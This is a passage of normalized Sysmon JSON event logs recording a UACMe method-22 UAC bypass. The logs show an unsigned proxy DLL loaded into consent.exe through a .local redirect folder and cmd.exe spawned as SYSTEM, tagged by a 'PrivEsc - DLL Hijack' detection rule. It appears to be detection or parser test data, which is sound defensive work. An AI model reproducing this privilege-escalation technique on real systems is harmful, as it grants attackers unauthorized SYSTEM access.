"FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.363Z", "type": "raw", "uuid": "4d0abd6d-a99b-4817-a3e0-6438c1b28920"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.9545970Z\"},\"EventRecordID\":\"5450\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:21.036\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7935-5d45-0000-001066ca0701}\"},{\"Name\":\"ProcessId\",\"text\":\"7324\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 7564 -s 152\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 7564 -s 152", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7935-5d45-0000-001066ca0701", "object.process.hash.imphash": "3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "7324", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:21.036Z", "type": "raw", "uuid": "d6803be2-c89f-4b40-acdb-cf8c80989d3f"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.1282657Z\"},\"EventRecordID\":\"5449\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.686\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7564", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.686Z", "type": "raw", "uuid": "7b523ccd-78ce-4af3-8d35-9273f3f6a8da"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:20.7314164Z\"},\"EventRecordID\":\"5448\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.405\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010a2a40701}\"},{\"Name\":\"ProcessId\",\"text\":\"4964\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": "747f3d96-7934-5d45-0000-0010a2a40701", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4964", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.405Z", "type": "raw", "uuid": "a47d229a-2311-48b1-a1ed-bdd13d9c59e0"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.9151203Z\"},\"EventRecordID\":\"5447\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.888\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7933-5d45-0000-0010227e0701}\"},{\"Name\":\"ProcessId\",\"text\":\"6000\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7933-5d45-0000-0010227e0701", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "6000", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.888Z", "type": "raw", "uuid": "b0eb41f3-3f63-4905-ba70-8743cd7bce72"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.8880688Z\"},\"EventRecordID\":\"5446\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3680\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.877\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "subject.process.id": "4740", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.877Z", "type": "raw", "uuid": "96aa7248-d4dd-4f79-96d5-69b12da589c5"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.8537652Z\"},\"EventRecordID\":\"5445\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.578\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001085ee0601}\"},{\"Name\":\"ProcessId\",\"text\":\"6388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 4740 -s 128\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 4740 -s 128", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001085ee0601", "object.process.hash.imphash": 